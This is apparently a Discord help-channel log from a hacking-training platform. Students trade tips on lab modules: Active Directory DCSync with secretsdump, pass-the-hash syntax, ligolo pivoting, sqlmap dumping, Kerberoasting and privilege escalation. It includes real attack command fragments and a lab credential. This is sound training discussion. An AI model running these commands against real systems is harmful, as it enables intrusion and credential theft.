with secretsdump

where

I thought this was the command for dcsync

Here is some additional information

Script Output

Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Tranlated: 1706175824000
System Time: 1706150624000

Sample Code of the Time Conversion
data = {"submit": "htbuser"}
date = requests.post(url, data)

dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")

print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
print("Time Stamp Request Tranlated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()

secretsdump can also dcsync, read the section again

Tried

https://tenor.com/view/jddjxj-dmndnd-head-smash-gif-17979724

What is the DRSUAPI approach?

😦 feel that

think about which machine you should be targeting and what credentials you should use

no not @ you

idk how you're passing the timestamp to your script but it should be something like dt_now = datetime.strptime(timestamp, "%Y-%m-%d %I:%M:%S%p")

Nah just in general your getting slammed

Hmmm aight bet! Thanks for the help!

This didn't work either

🤦‍♂️ use VSS, wait don't use VSS it's not supported

lol

you're literately targeting the same machine with the same creds, you're not listening

think about which machine you should be targeting and what credentials you should use

What machine should I be targeting?

... that's what I'm asking you

what's the target for raisechild.py

the logistics.inlanefreight.local

there's literately a -target-exec argument

All that gave me was the admin hash

as I've said, use the admin hash to dcsync

Do I crack the hash first?

Or is this a PTH?

What module are you doing

https://tenor.com/view/tom-and-jerry-soul-leaving-body-spirit-gif-14581897

I am super confused, I followed along and performed the module all the way to the end and I have no idea what's going on now

child to parent compromise from linux

I see xreous already told you to use secretsdump

the problem is you're only following the steps without understanding what they're doing

I just opened the section and it’s literally the first thing I see

So how do I dcsync with that hash?

I thought dcsync gives me the hash.

Have you tried googling?

Or checking the switches on secretsdump?

which is also given in the dcsync section

secretsdump.py -h

This is what I found from the previous DCSync section

Kali on my windows machine just has impacket-secretsdump before you ask where secretsdump.py is

Mate

Do this command

And see how the tool works

Blindly copy pasting stuff won’t get you anywhere

Output of that command literally has an authentication section

Okay, so I googled it as suggeste and found this

You have a Kerberos ticket?

Not sure why that would work though

Yeah I already got the ticket with ticketer.py

-k uses Kerberos authentication

I don't understand how this breaks down:

secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross

where does the hacker username come from? what is academy-ea-dc01.inlanefreight.local?

help me god

You could also have used the -hashes switch with the ntlm hash

error: a tunnel is already using this interface name. Please use a different name using the --tun option
anyone here know how to solve this ? (ligolo)

But where does the hacker username and dc01.inlanereight.local come in?

Seems you already have it set up?

yeah , the problem , when I try to double pivot

So what would that command have looked like?

I got the session but can't start it

Did you read the section?

make a new interface first
ip tuntap add user <user> mode tun <AnyName>
ip link set <AnyName> up
then start --tun <AnyName>

it's the new multi tunnel feature for ligolo

should I make new interface with each session ?

if you want to have multiple tunnels then yes

Didn’t know that

or you can stop your current tunnel and connect to the new one, apparently that also works

Yes

The section uses LOGISTICS.INLANEFREIGHT.LOCAL

I can't if I stop the session , I lose connection with the target

Is there an article about it? Or mentioned on their GitHub

apparently not I've been told, before the update that's what it does except is automatic

if you connect to the second session and start a new session: you're able to reconnect

yeah it's on github

This didn't work with the hash

you still technically are connected to both sessions: it's just stupid

Alright, thanks

Back to the use vss error

So what am I doing wrong with the command?

yeah stop just mean stop the tunnels, not the agent on the other side

^

but if you want multiple tunnels: you can create multiple interfaces

Did you read what format it wants?

and the target is also wrong

I tried with and without quotes

the old automatic switch method would stop the old tunnel and start a new tunnel ¯_(ツ)_/¯

nice it seems like connect with 1000s of networks at the same time

why are you targeting .240???

yeah, they only want the hash

What should I be targeting?

What are you targeting with a dcsync attack?

i wonder what device would be more ideal

hammer

Domain controller?

So?

target the flipping domain controller of the parent domain

Should it be 172.16.5.5?

Try and see

And here we see a wild xreous, slowly losing his temper

Oh my GOD it WORKED!

Who would’ve thought

I have no idea what that other command I used first from my google search was doing, but now I kind of understand what I did.

Don't understand the difference between the two IPs though

Uhh

It only gave me the machine IP for the question, so I'm just assuming based on the ones they used in the examples on the section

one is the domain controller, the other is not

I think you should go back to the start of the ad module tbh

no both is, just two domains and two DCs

in the module as a whole- whenever you had to target the DC, it was with the 172.16.5.5 IP

well yes, but most of the attacks were on the .5

yeah .5 is the right target, .240 is the child domain DC which doesn't have the user needed to answer the question

Seems like there's no rhyme or reason to this

So then why would the logistics.inlanefreight.local not work?

Hey! Anyone free to help me out with the Logrotate part of the Linux Privilege Escalation module? I'll explain what I've done so far in pm to not spoil to others 🙂

Is that the name of the child domain?

I have no idea, wish there was a map

I'm assuming it's the child domain

Domain controller, then inlanefreight.local, then logistics.inlanefreight.local

at least that's how I have it mapped in my head

Go back and read the domain trust primer section

you can create a network map/write one down

So why does it not work with logistics.inlanefreight.local?

That's where I got the hash

can someone explain to me how to ssh in htb academy?

ssh user@ip
prompt for password: [ctrl+shift+v] (Paste the password provided here

it's a security feature that it doesn't show as you type

tysm

it's basics

im noob xd

i'm aware ¯_(ツ)_/¯

you can also use google; if google doesn't help then you can ask here. Learning how to do your own research will improve your odds of retaining knowledge

i was searching in google but i didnt find anything

because your search was too narrow

"how to ssh"

nah hahaha

would have been better :)

if you add things like "in htbacademy" you'll likely run into a bunch of random forum posts unrelated to your query

Question regarding Windows Privilege escalation skills assesment part 1.

||So I managed to get SYSTEM level reverse shell using JuicyPotato, but it took a long time because I was trying to use nc64.exe instead of nc.exe which is propably 32bit? Why didn't the nc64.exe work? I spent like 2 hours figuring that priv esc and the answer was that I was using wrong version of nc. I just wanna know why that happened||

If the system is 32 bit, a 64 bit won't work

@fathom pendant This is from sysinfo: System Type: x64-based PC

You cam run 32 on a 64 but you can't run 64 on a 32

¯_(ツ)_/¯

Could also be limitations

Guess I'll just try both versions in the future if the first one wont work

Just to be sure

32 bit is usually the safer bet

Okay I'll keep that in mind

nc64 should work, maybe you got a broken version

Yeah I redownloaded it and my original version seems to be broken. Now it worked with 64bit version too. Thanks, should have checked this much earlier but better learn later than never

IP in the modules isn’t refreshing. I also cannot access target. I have submitted a ticket. Anyone else having issues?

Is anyone available for a dm? I've been stuck on Password Attack Lab - Hard for 2 days now and I've tried the recommendations given but still no progress.

What did you try so far?

Crackmapexec, msf6 smb login, and hydra for user|| johanna using the mutated list. Tried for smb, rdp and winrm.||

||Mutated list|| should work try again

I've tried it several times over the past few days with cme on smb, winrm and rdp and the brute force just goes on for hours.

Hello,
I have a question related to SMB null sessions on a domain joined computer.
Will this allow us to enumerate users, groups?

Any other recommendations?

you can rid brute iirc, but can't query a list of users/groups

check your DMs

@next bronze oh ok, thanks a lot
Since it worked on a domain controller, I thought it would be doable as well on a domain joined host

OK this is going to be a long one and any help that can be offered will be greatly appreciated. On 3rd day of struggling with this. On the Active Directory Enumeration and Attacks Skill Assessment Part 1 || On Webshell I uploaded my mimikatz and rev shell using web shell. I then ran "setspn -Q MSSQLSvc/SQL01.inlanefreight.local:1433" got "existing SPN Found", I then activate my rev shell through metasploit and when running mimikatz I get tickets for 4-40a50000-web-win01$@LDAP~DC01.INLANEFREIGHT.LOCAL and not for svc_sql , so confused on what I am doing wrong || I will delete this once I get an answer, thanks, after 10+ hours I am at my wits end

which question is that and what are you trying to do

"Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer" I got the account name, just failing in Kerberoasting part, not finding them in memory even after using setspn

you want to use the manual method? did you run New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ...?

but seriously, just use automated tools like powerview/rubeus/impacket/netexec, any of these will get you want you want

hey can i ask some questions to any of you here in dms its about msfconsole

Hello. Can anyone help me with the footprinting module, DNS section. I'm on the last questions. I completed all the other questions using zone transfers to get the info. now im on What is the FQDN of the host where the last octet ends with "x.x.x.203"? but I dont see any 203 octets in my results.

The hint seems to suggest i use a tool like dnsenum, ive tried most of the wordlists in SecLists/Discover/DNS and still getting nothing back with a 203 octet.

Any ideas?

DM me

Not sure what I am doing wrong:

" Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. "

The command I executed :

||"bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u sapsso@inlanefreight.local -p pabloPICASSO||"
https://academy.hackthebox.com/module/143/section/1509

Have you tried to bruteforce any of the subdomains to see if you get any results?

did you pivot

the DC looks to be in an internal network

Nope. Would I pivot with this address?

ah then no need, can you ping the target?

yes . \

try running bloodhound-python with -ns <ip>

wait what

aren't you pinging yourself

The attack host is already on the same network as the targets if i'm not mistaken

it looks more like a problem with the pwnbox itself, have you tried resetting it?

The target ips are down anyone else. ???

Sent this to support and no reply

I’m down too idk what is going on over there

Welcome to HackTheBox Academy! It depends on your goals to be honest. What you aim to use academy for? If you're into pentesting you should go the CPTS path, if you're into bug bounty go CBBH path

so possibly reset the pawn IP box , ssh't into pawn IP box(which is the attack IP) and run that blood hound command again)>

I’ve done all of that and use multiple browsers deleted my cash and everything it is 100% something on their end that is messing up

yes I have and I only get x3 subdomains back none of which are 203 octet

i'm thinking to study just the modules

did you try running it with -ns <dc-ip>

Maybe change the wordlist? Remember the hint, you're on the right track

Yeah but what do you aim to study, i mean which topics? I would suggest to get a student membership also, really a steal at the price you pay

i've tried nearly all the wordlists in SecLists. Do i really need some outside of that?

ok thx bro

They don't give you the dc-ip(unless dc-ip is the 172 address on the internal attack machine)...only the name of the domain controller(└──╼ $bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u sapsso@inlanefreight.local -p pabloPICASSO)

Are you trying in the Discovery/DNS folder? If so, what you're looking for is there. I just checked

yh im working my way through them. Ill keep going

which browsers

Hello Guys I'm new in this server and I have 0 knowledge about hacking. Could anybody guide me what should I do in order to learn the skills?

Chrome and edge

Ip doesn’t load with time rate. Ping doesn’t work. Taking ip and curling it doesn’t work, cannot display ip addy via browser

I’ve submitted a ticket about 5 hours ago for some reason they are super slow to respond today.

try pinging google

Sup Climax! Welcome to HackTheBox Academy! What do you aim to learn here?

ping the fqdn or nslookup

Hi I want to learn fundamental knowledge about hacking

Tech support must be off today

That's cool man, hacking is way harder than tv shows or hollywood makes it to be. Way more frustrating too. But it gets easier, you have to study and learn a lot and that's the hard part, but it does get easier.

I would recommend following the Information Security Foundations path. You can find it here https://academy.hackthebox.com/paths or on the menu on the left side of your screen by going Paths -> Skill Paths

It is made by the following modules

Introduction to Academy
Learning Process
Setting Up
Linux Fundamentals
Windows Fundamentals
Introduction to Windows Command Line
Introduction to Bash Scripting
Introduction to Networking
Intro to Network Traffic Analysis
Introduction to Active Directory
Introduction to Web Applications
Web Requests

After that you can go the CPTS path, CBBH path if you're into web or bug bounty, or go SOC Analyst route if you're into blue team.
I'd recommend a student subscription if you're a student to get the most out of academy.

Thank you so much

Is there anyone here that works at HTB, or mods that know someone. I submitted a ticket 6 hours ago with no response. What’s going on over there ?

dude. a day is a reasonable wait time, it's also off office hours for them

You're welcome, if you have any trouble or get stuck you can ask for help in this channel. Remember to state what you have tried so far, and if possible provide which command you're running or what you're trying to do. Makes it easier for you to get help

I see. What time zone

uk

Okay Thank you

That makes sense

eu2 works btw, just spawned a lab with 5 machines

I’m on HTB labs

I dont think they have 24 hour ops

North America

This channel isnt for help or complaints about htb labs my dude, read #welcome on how to access more of the server

Thank you

Im trying to start the machine in pass the hash thats in password attacks module and it doesnt start, is something wrong with the site or is it me?

It’s not just you buddy

aight bet, shit been bugging me

Probably just you. But it's likely the site it's been a mess since last seasonal lab dropped

I sent a message hours and hours ago

Try changing vpn region

ok bet

They're likely handling lots of complaints regarding the issues atm

Then, again, my issues from hack the box labs

It’s OK no worries

Similar infra

Thank you Marcie appreciate it

It is what it is can’t always be perfect things happen

there's only so many support staff to handle the numerous people complaining about shit breaking ¯_(ツ)_/¯

I have to look at the seasonal labs. I’ve been doing the Academy. Haven’t really checked anything else.

Where do I ask a question if I'm stuck on a question in a module?

here

pretty sure ive tried every one now and still nothing

Go after one of the subdomains that you find with a zone transfer

DM, and i'll give you a clearer hint

I mean if they enumerated with a zone transfer for a list of subdomains available then the next step is easy ¯_(ツ)_/¯

I'm on the Linux Fundamentals module. I cannot find where a directory name "mail" is, or what they are talking about in regards to "mail."

env

@fathom pendant thanks, let me try that

Then look for a variable that would correlate to mail

Thanks @fathom pendant

still have problems with spawning target on tunnelling module

🤬

Does anyone have the same problems?

Have you tried changing vpn region?

I have the list of sub domains under int****.inlanefreight.htb but running them through dnsenum or trying manual zone transfers all just give errors. Unless I’m doing something wrong syntax wise

I told you. Stop looking at internal

Look at just the base domain

Start there

Just dig axfr inlanefreight.htb @ip

I think I told you the other day when you were struggling. To stop looking there

I’ve done this too. Think you’re thinking of someone else. I started this section only today

You've already ruled out internal

So look elsewhere

I’m pretty sure I have tried other stuff and dns enum just errors. I’m away from my desk now so I’ll try later

Just gotta be patient, let the command finish before ruling it out

You're likely to get some cannot reverse lookup error or Whatever it says

But if it doesn't stop the command then it's not a fatal error

Hey guys in the Pivoting, Tunneling, and Port Forwarding Module I performed the Web Pivot with Rpivot and managed to get the flag through curl, however firefox would not work through proxychains even though I configured it to localhost port 9050. I was wondering if there was a way to fix this

Strange, when you tried firefox did it give you an error?

Is the proxychains.conf file configured correctly? Did you follow all the examples correctly?

I remember doing this module and things went swimmingly really

firefox itself would pull up, but it would just load, however an error would pull up saying the socket was timing out.

I think i mapped proxychains to the correct port, im basing this assumption off the fact that I used proxychains when I curled the page, wouldnt that fail as well if the .conf file was configured incorrectly?

Can someone help me with https://academy.hackthebox.com/module/58/section/517 ? I can't seem to get the cookie value for question 2. I've tried python3 sqlmap.py -u http://94.237.54.50:45516/case3.php --cookie="id=*" --flush-session and receive "the parameter is vulnerable" but no flag. If anyone can help I'd appreciate it.

you haven't got any retrieval options, try --dump but remove the --flush-session. it caches its results if you don't flush it, and will start data retrieval immediately

I got it now thank you for your help.

Thank you

GOt it now

Hello, I am needing help with "introduction to bash scripting" in the academy. I am following the material decently, but I can't figure out how to run the bash code in the terminal.

like open a terminal and type it?

kindof, it wants me to edit this code, and come up with an answer

#!/bin/bash

Count number of characters in a variable:

echo $variable | wc -c

Variable to encode

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
var=$(echo $var | base64)
done

but when I copy and paste the code into the terminal, it attempts to run it in a weird way and I get a bunch of errors

Right. It should be edited

Try doing " echo "nef892na9s1p9asn2aJs71nIsm" | wc -c"

Hello I'm doing the Linux Privilege Escalation module and I'm having troubles with the Kernel Exploits section. I've complied the exploit code that the module refers to, on the target machine, but when I run it I get an error saying "error: permission denied". I've attempted to exploit it using MSF as well without any success. Anyone willing to give me some input?

is there somewhere that i should be editing the bash code that isnt in the terminal?

vim or nano

nano file.txt

or vim file.txt

ah. That is definitely what I was missing.

lol

Is it a good idea to use --batch --dump for most uses of sqlmap?

Hey, guys, DNS question. How can I know that I'm fetching data with a zone transfer from a primary dns server and not a secondary? I struggle to destinguish between dns servers, name servers resolvers etc.

depends, if it's a small db sure, but if it's big and you're using something slow like time based it will take forever. in that case you can query what database and tables are there and dump the specific table

yeah def above for --dump. --batch simply takes the default options for any user input sqlmap needs (after the initial command execution obv). i usually keep it on for convenience, the majority of the time you'll want the defaults

only time its annoying is when it auto tries to crack hashes, and its just a bunch of bcrypt ones or something

hey guys, do u maybe know if it's possible to use mssqlclient.py with username and it's hash?

and what is the correct syntax

cause I didn't understand from the help ....

yes, its the same format as all impacket scripts

-hashes :<nthash>

may I DM?

no just ask here

thats...bizarre

is there something I miss?

oh wait

space

-hashes :<hash> not -hashes:<hash>

Would I ask for help with the starting point boxes here?

you would not

youd follow directions in #welcome to verify your account and then youll gain access to #starting-point and can ask there

thanx

thank you!

np and congrats on being able to read you dont know how many people come in asking the similar stuff and freak out when told this isnt the correct place lmao

using something like "-T table --dump" for larger DBMSs?

yep

thanks

HTTPs/TLS Attacks
Skills Assessment

I am able to decode the user cookie, but when I try to recreate a plain text cookie I get issues.
command:
||padbuster http://<IP>/admin "<cookie>" 16 -encoding 1 -cookies "user=<cookie>" -usebody -error 'Decryption failed' -plaintext "user=admin"||
Results:
||Encrypted value is: 6a25b6eb723fffd50c12065d2689f6d500000000000000000000000000000000|| Cookie does not work at /token endpoint.

Gotta feeling I am going to get roasted for this but I am getting this error when attempting to SSH in Permission denied (publickey).

did you give permission to the key?

I gave my id_ras 600 and pub 644

rsa*

Which module /section
also post the output of your command or the results

@soft cedar lol wait ignore me, I have covid currently and am loopy. Its creds for the web server.

Damn man is US 1 still not working? Tired of using EU

Its on the fritz

heyo just checking that im a dumbass, just trying to start the first part and the walkthrough is in linux, im on windows, please dont tell me I have to get linux

just use the pwnbox

Im poor though

than you should use a VM

and the guide for that is where?

Most of what is covered here and elsewhere regarding this topic is LINUX based

one sec

here you go https://google.com

thanks man

im only an hour into this and want to jump out of a window

The computer experience

anyone experiencing issues with spawning Target machine?

Got VM installed

got unbuntu

but it says it doesnt have enough disk space to install the browser

in setting I gave "system" I gave it like 20 gigs cause it wasnt working

@rustic sage

the hell do I do now?

huh?

??

You should make sure you're installing everything correctly. There is loads of info online to show you how

well I got the ISO set up

it just wont download the browser?

idk what to tell you without more info. it's probably online somewhere tho. Anyhow,I don't use ubuntu

https://discord.com/channels/473760315293696010/691583669374025802

No Access

Why does your about me say you're part of an online terrorist organization? And that I should report you to the admins at once?

Ah wait

hi there, anyone else is having some trouble to spawn lab exercises machines?

LMAO

Just found it burried in some dumb setting

anyway gonna scuttle this acount and go off the grid, thanks

Been an issue for a while now. Just give it a couple minutes to spawn

I've more than 20 mins spawning Print Operators/WinPrivEsc lab exercise

Why are these targets taking so long to spawn?!😒

HTB has had issues with spawning lately that have supposedly been fixed but I still see mass people having issues

hi guys
Doing Documentation & Reporting Practice Lab

to access to 172.16.5.5 from target machine, should I do initial foothold for local user? or provided?

I have some users id no password

i need help

With what

Linux Privilege Escalation Environment Enumeration

I got flag in root folder then i submit but incorrect answer :/

Why are you escalating?

environment enumeration

Yes

That wasn't a yes or no question

I was asking why, if you read the question maybe you'll understand why it's wrong

Because i found flag.txt in root folder

Read the question. The root flag is for a later part

Ops hahahaha

Literally reading a question will help you figure out why you're dumb lol

Even though linux priv esc module is tier II you get 100 cubes 🤩

what ? how ?

The ipmi cracking in the footprinting section is taking forever. I'm not sure if I'm impatient or if I'm doing it I correctly. The hash is definitely selected as the target and I'm using rockyou. I disabled hashcats potfile too so that the program should stop and display the password.

If it ever cracks it ;-;.
I tried googling it too and using na online hash cracker to check if it was an easy one but guess I'll have to wait (?) Minutes/hours until a password matches my hash.

😦

Maybe an errata?

you are the only one , who had this +100 cubes , i guess

I was happy after seeing +100 cubes now I am sad

I bought on platinum , for next will gold suffice? for CPTS path

idk , I use student subscription

ohk

ok so

like 4 hours in

finally got the vm working

How do I get openvpn to function

openvpn vpnfile.ovpn

and where do I download it?

I just need a good guide

I believe sudo apt-get install openvpn or something similar. Depends which distro you are using. Now is a good time to practice your Google skills! You're gonna need em.

Yeah I got that far, but its asking for m1

sudo *

asking for what?

^ yeah use sudo

[sudo] password for vm1:

No idea what that means

You type in the root password now

You won't see the letters as you type for privacy reasons.

what distro did you install? either you would've set it or its the default

It just seems he may not know what sudo is. New to Linux.

ah mb

ubuntu

It's okay though Google will help anyone you're confused too. It can be confusing the first time using sudo and not seeing your letters come up.

Oh wait they dont show up

Fr happened

Got it got it

Had to look

Yeah I imagine it's pretty common when you've never used Linux. On windows most people just click run as administrator and click yes.

Probably similar for Mac too. But I'm not a Mac user.

IT WORKED

I was so confused at first glance when tried on VM

Connected to the VPN now?

Then saw it was normal

got it installed

very nice, now just need to yoink a vpn key and connect to it

got it

are you wanting to do academy or starting point?

starting point

no idea what im doing

Hey, has anyone completed and possibly has notes on the ipmi section of the footprinting module? This password is not being cracked for the life of anything, I would really appreciate some help.

so wait I got the whole "sudo apt-get" thing, what now?

sorry, might've misspoke. if you're completely new to linux, I'd prob recommend the linux fundamentals module on academy first

Academy with information security foundations is too good

otherwise starting point is going to be very frustrating

got it......

Yeah but what comes after the sudo apt-get

what are you trying to do?

The apt-get command only fetches repositories that contain programs and files

Get open vpn working

do you have the vpn key?

downloaded from academy?

yeah?the opvn?

Fr guys any help with this module section? I've lost my patience cracking this password. I've tried the 10k dictionary and have had rockyou going for about an hour, but only up to a max of 20 mins while I've tried other stuff

yeah, awesome

sudo openvpn [path to the ovpn file]

got it

The password cracking is the most frustrating.
I'm not ever sure if I have the right wordlist to get it fast, like ofc rockyou is probably going to get it but after an eternity and a half. I let the whole 10k slide and it didn't find the pw.

no clue sorry vendetta, im sure someone will pop up eventually whose done it

True cracks 10k. Found by using locate pass | grep common.

marcies almost always lurking somewhere

And alright I appreciate it. That is the most annoying part though is the password cracking, at least in my experience.

In normal pentesting I don't mind of course cause that's part of the process, but here on the modules I feel like it's holding me from progressing.

absolutely certain you're supposed to crack that hash?

(this isnt a hint, i have no clue of the module content, just checking)

"Cipher negotiation is disabled since neither P2MP client nor server mode is enabled"

Absolutely certain. I got this password hash leaked from the ipmi server and just need to crack it. I used a hash checked and found it was sha1 too to verify.

did the module give you a wordlist to use?

So yeah it's like I have the password hash, I know how to crack it, but it is taking forever so I'm not sure if there's a better wordlist to use or what.

It did

Let me try to use that. But I think it was for a previous section of the module not related to ipmi

mm maybe, afaik modules are very fond of reusing things like that

I'll give it a shot and let you know

It's just a list of 100 first names so it's unlikely but we will see

is your vm connected to the internet?

uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

oh yeah prob not then mb

one second

well the browser works and the eithernet works to so

yes

Sigh, I cancelled my rockyou scan at try 11k and tried the 101 items from the modules wordlist and no dice ... 😢 That really hurts lmao.

ok so yeah

I even used the ipmi_passwords.txt and that didn't work!

we may have been abandonded Vendetta

You're fine if you haven't done the module you can't really help. 💀 But Jesus do I want to die rn because of cracking.

We could ping em?

What's your problem? Are you connected to the VPN? Are you connected to the Internet?

VM has internet

But "Cipher negotiation is disabled since neither P2MP client nor server mode is enabled"

That happens when running your openvpn command?

yep

wait no

What command did you run

sudo openvpn [path to the ovpn file]

but with the actualy location

What program gave you that error output?

just running that command

"must define TUN/TAP device"

It shouldn't say that when you run sudo openvpn file.ovpn

And Jesus I still can't get this hash to crack. 😭

Computers fucking suck

As anyone who has ever done tried to do something not suggested by the manufacturer knows

Ok so wait did that and god "In [CMD-LINE] : 1 : Error opening configuration file: file.opvn"

So your path to the file is messed up

Just open a command window in the directory you have the file downloaded, and just use the name and not the path

in the directory where I have the file downloaded?

help guys... i can nmap nfs and listing some files, but mount doesnt work. it says incorrect mount option specified

Yess. Probably in your downloads. Go to your downloads in the file explorer and shit + right click the empty space and click open terminal here

got it

thanks man

Working now?

chcekin rn

I've still not cracked this password I'm beyond pissed 😂 this is a really shitty situation as Google isn't even really helping me out. The command in the module literally isn't working and many similar commands using hashcat keep giving me problems

Ok so what do I enter now?

tried the early stuff but just got it all jumbled up

WAIT IT WORKED

Has anyone else experienced issues with the machine on the LLMNR poisoning from windows section of the AD module? I am about to complete the entire CPTS path and haven't ever been able to RDP successfully to it after actual weeks of intermittent attempts lol.

Ok so yeah it worked

How you can connect to the machines that you spawn in htb!

did you quote everything properly?

Thank god, it only took me five hours but I can actualy do the part thats supposed to be fukcing hard

some commands in the module doesnt work for me. i had to quote it

anyone? probably just me seeing this

As in the xfreerdp command? I think the rdp connection goes through but all I have ever gotten is a black screen.

Normally I just have to wait a few minutes on the other machines to RDP and the black screen goes away, but that just has never happened even after like an hour of waiting on this one, it is bizarre

oh, i get that pretty often. you have to retry, and switch vpn

sometimes i have to retry the same thing 20 times before it works

Module XSS Section Phishing
I ran the xsstrike and got payload escape character as '> but couldnot understand why is '> escape character instead of ">

creating the instance is taking hella long

God damn I finally got the password cracked. The module gives examples of hashcat but they DO NOT WORK. I used msf to output a jtr hash file and rip the hash from there with the top million password dictionary.

hahaha

Also the box is taking forever to load

Ppl still having some issues with the load time of the instances it seems

damn

For me is working fine for now

😅

The rage was real 😭

Hey how do you install Nmap?

cause i tried "rpm -vhU https://nmap.org/dist/nmap-7.94-1.x86_64.rpm" but it aint working

Did you try sudo apt install nmap

huh

will do

black screen usually means the remote computer went to sleep

when on the black screen try hitting enter a few times

yeah i dont think you're gonna have a very fun time trying to do this on ubuntu, you'll have to install most of the tools its talking about

eh

its not that bad

id recommend parrot or kali, kalis more supported but parrots affiliated with htb

just kinda sudo apt install

oh god time to reinstall everything

up to you ofc, i just find installing shit tedious

thats fiar

which one would you recomend for a complete linux idiot?

parrots not too bad, you're just using it for htb right?

yeah

its the same os as on the pwnbox, so if you've come from that, might be an idea

got a link?

https://parrotsec.org/docs/virtualization/install-parrot-on-virtualbox/

thanks

the iso downloads just on the parrot website, think theres a htb specific version

Wow last time I checked there wasnt an HTB specific ver.

And there is it now

wait jan 24 2024, release date

nvm

thats just the ver

for some reason it doesn't have a search bar like the normal parrot, but that could just be a skill diff on my part

omg they have torrent, thats illegal, oh no guys

Idk what happened to my VM cause it dissapeared so sudden after updating it (was VMware workstation), gonna use VirtualBox this time

"Unattended Guest OS install setup"?

wheres this showing up?

Scratch that fixed it

That doccumentation was really good

Thanks man

AND IT ONLY TOOK ME 7 HOURS

👏👏

you got this

how many of us got jobs from htb ?

everyone in this server is a htb employee

I like to install to a USB instead of use a VM. Been using pwnbox for academy though cause it's all in one place.

lmao

https://tenor.com/view/wojak-wojak-sad-summer-finna-be-a-movie-gif-18724859

hey wassup i ran my own payload on my main comp just to test it out so i hope nothing happens to it right ? (i made the payload in kali machine and used victim comp as my main)

Hello all!
I'm stuck with: module/67/section/642
Windows Privilege Escalation -> SeTakeOwnershipPrivilege
Task: Leverage SeTakeOwnershipPrivilege rights over the file located at "C:\TakeOwn\flag.txt" and submit the contents
But the current user (htb-student) hasn't this privilege 'SeTakeOwnershipPrivilege' =/

Stuck on
ATTACKING COMMON APPLICATIONS: Attacking WordPress

Question:
Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.

I have found the two users with admin access admin and dXXX and also the flag, but can't find the user for the above.
Needs a little nudge..!!

check /etc/passwd

reset the target

Reset 3 times, without changes 😦

oh, read the section on how to enable it

This privilege can be enabled if it is in the "Disabled" status. In my case, the user basically doesn’t have it

cat

ahh sorry sorry

open powershell as administrator

Thanks..!

Thanks..!

Thank you!

nice was gonna check it myself, been a while since I did that module

Hey !
When I try to connect to htb academy with the openvpn it gets connceted.
But after few minutes, it keeps geting restart
I delete the vpn file, download again, changed the server download again, but still showrestart. Until I shut down my entire VM and then again start it works.

Do anyone has any permanent solution for it?

Reach out to support

module211 section2274 . I have entered " admin*" as the answer that comes in the KQL query after the "user.name:" It is showing as a wrong answer. Also, is it posibble to upload a screenshot here?

did it last night so it was fresh in my memory 😉

Hello everyone! I am stuck on Nibbles as part of the Academy module "Getting Started". I'm essentially following the walkthrough and I'm getting as far as echoing an IP to monitor.sh but when I do monitor.sh is suddenly not recognised and if I try sudo it still asks for the password.

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.

Intrusion Detection With Splunk (Real-world Scenario)

I need some help for that, what I have done filter the C2 IP, and Compromised Machine IP with some rulename, but none of the port is right

There is something i dont really understand. My user account is in the administrator group

but i can still not access the administrator folder?

i can clearly see my username when i do net localgroup administrator

ok, open a new powershell and run as administrator, and now use that powershell to access administrator folder

it still asks me for a administrator password

oh

use your password?

brainfart

i was stuck on that it wanted the administrator password

didnt know i could just "for more options" and see my account

lol, that would have made things a lot faster. I was trying to pop shells on each

does any one know what the Weekly Streak bring. They say it gives special rewards. But what did this mean? and how high need the stack be? is there a public list?

it hasn't been decided yet

thanks

damn 90% done with the cpts

just as scared as i was when i started lol

anyone done the + 0 Search the file system for a file containing a password. Submit the password as your answer. on windows privesc that could give a hand?

i've found a password in ||powershell logs|| but it isnt valid.

as well as i've tried the different techniques that they showed

maybe im missing something obvious but yeah

i can send the password i am trying in dms to you

i just need a sanity check here

found it

i was in a directory to deep

Hi everyone! I just finished the Skill Assessment for the "WINDOWS EVENT LOGS & FINDING EVIL" module. I completed all of the questions using the Get-WinEvent command. Should I practice investigating with the rest of the tools mentioned on the module (I guess that should be a bit more chunky, but I do not want to miss any important practice 😅 )?

It doesn’t hurt to practice, but they are more for you to understand how to do it the slow way, the next modules will introduce you to SIEM solution that make working with logs much more comfortable and enjoyable

Is there an issue with Evil-WinRM? I am trying to connect with some creds I found with crackmapexec and even tried them with -x, but I am getting some SSL error with Evil-WinRM.

Might need to update your openssl

I have latest on my parrot. Says 3.0.11

I also tried with the -S switch but neither works

Makes me wonder if it's the server having an older version

Does "Life Left" also have a bug in your questions? No more timer appear for me, just the word "minute(s)"

Linux Privilege Escalation - Kernel Exploits
i downloaded the exploit to the machine and ran
gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit
when i tried running ./kernel_exploit i get permission denied error

Do you mind sending me a dm with the exploit you are trying with @warped cloak

@warped cloak sudoed? su?

tried that still doesnt work

hi im on kerberos attack skill assessment question 2
Which machine has unconstrained delegation?
already has d* cred, but i can't use rdp
is it expected ?

I have troubles with Attacking Common Services - Attacking FTP. First question
I checked the solution but i can't get the same result, i think the machine is blocking some ports

rdp isn't always available

